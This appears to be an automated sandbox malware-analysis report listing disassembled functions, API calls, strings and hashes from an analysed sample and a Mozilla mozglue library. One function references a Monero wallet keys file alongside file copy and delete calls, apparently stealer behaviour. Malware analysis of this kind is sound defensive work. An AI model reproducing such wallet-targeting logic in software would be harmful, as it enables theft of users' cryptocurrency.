Part of subcall function 6CADCFE0: EnterCriticalSection.KERNEL32(6CB5E784), ref: 6CADCFF6
Part of subcall function 6CADCFE0: LeaveCriticalSection.KERNEL32(6CB5E784), ref: 6CADD026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CB0D1C5), ref: 6CAFD52E
EnterCriticalSection.KERNEL32(6CB5E7DC), ref: 6CAFD690
LeaveCriticalSection.KERNEL32(6CB5E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CB0D1C5), ref: 6CAFD751

Strings

MOZ_CRASH(), xrefs: 6CAFD4BB

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: b57dd2a43df21894766767bca04762419375e3cc9c71097dce8b5885e02dca1b
Instruction ID: 7fe05e4406dad5b2967dc0d571e58786c1f7ec51760a623c9e51a2c1e841def3
Opcode Fuzzy Hash: b57dd2a43df21894766767bca04762419375e3cc9c71097dce8b5885e02dca1b
Instruction Fuzzy Hash: FF512271F047858FD755CF28C09075ABBE1EB89304F984A2EE5AAC7B84D730E841CB92

Function 00ACC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtGetStringTypeA.LIBCMT ref: 00ACC8EC
___crtLCMapStringA.LIBCMT ref: 00ACC90C
___crtLCMapStringA.LIBCMT ref: 00ACC931

Strings

, xrefs: 00ACC896

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: String___crt$Type
String ID:
API String ID: 2109742289-3916222277
Opcode ID: 2608c69be2d9dccc995312f91f58cd750a9ceaff002e048c5a433e9912c0d665
Instruction ID: 47f1788b48a5cacc670aafae136c09c3374b9e4a461df5d3036f91418e64bb98
Opcode Fuzzy Hash: 2608c69be2d9dccc995312f91f58cd750a9ceaff002e048c5a433e9912c0d665
Instruction Fuzzy Hash: D341E6B150079C9EDB218B24CD85FFBBBF89F45714F1444ECE98E86182E2719A45DF60

Function 6CB2B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CAD4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CB13EBD,6CB13EBD,00000000), ref: 6CAD42A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CB2B127), ref: 6CB2B463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CB2B4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6CB2B4E4

Strings

pid:, xrefs: 6CB2B4DE

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 199be14ca223bb2ebe511df0b6125ced60405abc462499f4d63fa799a7c3a6d9
Instruction ID: 2f98e01e0b04a387ec87250f5920b743749c7c6f345b5877886d2b3a56f9c27d
Opcode Fuzzy Hash: 199be14ca223bb2ebe511df0b6125ced60405abc462499f4d63fa799a7c3a6d9
Instruction Fuzzy Hash: 24311831A01244DFDB00DFA9D880AFEB7B5FF09318F580529D82667A41DB35E949CBE1

Function 00AC87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00AD0E28,00000000,?), ref: 00AC882F
RtlAllocateHeap.NTDLL(00000000), ref: 00AC8836
wsprintfA.USER32 ref: 00AC8850

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Strings

%dx%d, xrefs: 00AC8847

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: c981ec4697e504c04c9f13bb0552c09a7187382894971fd540b4351903b66299
Instruction ID: 8b4246eb5ac12ed8259c031496b1592d6bf547355ef9d0c54027ca80df949eb3
Opcode Fuzzy Hash: c981ec4697e504c04c9f13bb0552c09a7187382894971fd540b4351903b66299
Instruction Fuzzy Hash: 7F210DB1A44208AFDB04DF94DD49FBEBBB8FB48755F104519F609A72C0C779A901CBA2

Function 00AC8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00AC951E,00000000), ref: 00AC8D5B
RtlAllocateHeap.NTDLL(00000000), ref: 00AC8D62
wsprintfW.USER32 ref: 00AC8D78

Strings

%hs, xrefs: 00AC8D6F

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: e0e7fb43b5afc44d2b6149e23f48fe7db821de066d0e8d7f908ec319abc715e9
Instruction ID: 621f9da2dc30efbe6c4afe6ba63030a61c15185225557caa8eca0cbaabd93064
Opcode Fuzzy Hash: e0e7fb43b5afc44d2b6149e23f48fe7db821de066d0e8d7f908ec319abc715e9
Instruction Fuzzy Hash: 8BE0ECB5A40208BFD710DB94DD0AF6DB7B8EB44746F004195FD0E97280DAB19E10DB97

Function 6CB20C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CB20CD5

Part of subcall function 6CB0F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CB0F9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CB20D40
free.MOZGLUE ref: 6CB20DCB

Part of subcall function 6CAF5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CAF5EDB
Part of subcall function 6CAF5E90: memset.VCRUNTIME140(6CB37765,000000E5,55CCCCCC), ref: 6CAF5F27
Part of subcall function 6CAF5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CAF5FB2

free.MOZGLUE ref: 6CB20DDD
free.MOZGLUE ref: 6CB20DF2

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: bd7b4a234c06dbc62e8269f7a36442273a688732c5016957c447dc5c1fdb8897
Instruction ID: 354a755d277705988673f116054cc6a3b6c3da2e279b7a6213f4c18e6e3a2e00
Opcode Fuzzy Hash: bd7b4a234c06dbc62e8269f7a36442273a688732c5016957c447dc5c1fdb8897
Instruction Fuzzy Hash: FA410671A097948BD320CF29D1807AEFBE5BFC9654F508A2EE8D887750D7749489CB82

Function 6CB2CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6CB1DA31,00100000,?,?,00000000,?), ref: 6CB2CDA4

Part of subcall function 6CAECA10: malloc.MOZGLUE(?), ref: 6CAECA26

Part of subcall function 6CB2D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CB2CDBA,00100000,?,00000000,?,6CB1DA31,00100000,?,?,00000000,?), ref: 6CB2D158
Part of subcall function 6CB2D130: InitializeConditionVariable.KERNEL32(00000098,?,6CB2CDBA,00100000,?,00000000,?,6CB1DA31,00100000,?,?,00000000,?), ref: 6CB2D177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6CB1DA31,00100000,?,?,00000000,?), ref: 6CB2CDC4

Part of subcall function 6CB27480: ReleaseSRWLockExclusive.KERNEL32(?,6CB315FC,?,?,?,?,6CB315FC,?), ref: 6CB274EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6CB1DA31,00100000,?,?,00000000,?), ref: 6CB2CECC

Part of subcall function 6CAECA10: mozalloc_abort.MOZGLUE(?), ref: 6CAECAA2

Part of subcall function 6CB1CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CB2CEEA,?,?,?,?,00000000,?,6CB1DA31,00100000,?,?,00000000), ref: 6CB1CB57
Part of subcall function 6CB1CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6CB1CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CB2CEEA,?,?), ref: 6CB1CBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6CB1DA31,00100000,?,?,00000000,?), ref: 6CB2D058

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 33e1572da01bc7f9ad01b339db4504c51bfe64f6e4cc7be1c7f9841aeeae5508
Instruction ID: da19969df6ae8c8afa302d5dc4d827b1a4c965cf264e9e541588927b943200e6
Opcode Fuzzy Hash: 33e1572da01bc7f9ad01b339db4504c51bfe64f6e4cc7be1c7f9841aeeae5508
Instruction Fuzzy Hash: DAD17E71A04B469FD718CF28C5907A9F7E1FF89308F01862DD85987752EB31E9A9CB81

Function 00ABD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

Part of subcall function 00AC8B60: GetSystemTime.KERNEL32(00AD0E1A,005EE870,00AD05AE,?,?,00AB13F9,?,0000001A,00AD0E1A,00000000,?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00AC8B86

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ABD481
lstrlen.KERNEL32(00000000), ref: 00ABD698
lstrlen.KERNEL32(00000000), ref: 00ABD6AC
DeleteFileA.KERNEL32(00000000), ref: 00ABD72B

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 50a776e85d6f8ec29ab2263d586ce501180e3a65d0f9f9ba3325c904ea60140e
Instruction ID: 8296a85c7241a041b1d2dec2c04e5a3871b64a9ebe60a658711b0e981c975f36
Opcode Fuzzy Hash: 50a776e85d6f8ec29ab2263d586ce501180e3a65d0f9f9ba3325c904ea60140e
Instruction Fuzzy Hash: E791DB729101089BDB18EBA4DE96FFE7338AF24304F51456DF507A6091EE346A49CB62

Function 6CAF5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6CAF5D40
EnterCriticalSection.KERNEL32(6CB5F688), ref: 6CAF5D67
__aulldiv.LIBCMT ref: 6CAF5DB4
LeaveCriticalSection.KERNEL32(6CB5F688), ref: 6CAF5DED

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 5a5287c274e8ed3c8ca943ab172146153f4a171494c2e528269cfd9848a21a6f
Instruction ID: 60dfb85c5a4c94f22eb3d5141762733b247bc46b6fb045077a7e7e5f049c09a5
Opcode Fuzzy Hash: 5a5287c274e8ed3c8ca943ab172146153f4a171494c2e528269cfd9848a21a6f
Instruction Fuzzy Hash: 60518F71E011598FCF08CFA8C854BAEFBB2FB89304F59861DD865A7790C7716986CB90

Function 6CADCDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6CADCEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6CADCEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6CADCF4E

Strings

0, xrefs: 6CADCF30

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: a5ecdd375949f1cf14869ae2b1383999e44638887876c078c140600cbdaa1ca4
Instruction ID: 37e773762f71a083c377131fffb4903517b3e88a516cf3911401b727941cba25
Opcode Fuzzy Hash: a5ecdd375949f1cf14869ae2b1383999e44638887876c078c140600cbdaa1ca4
Instruction Fuzzy Hash: 47511071A042568FCB00CF18C890AAAFBB5EF99304F2A859DD8595F352D731BD46CBE0

Function 00AC3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
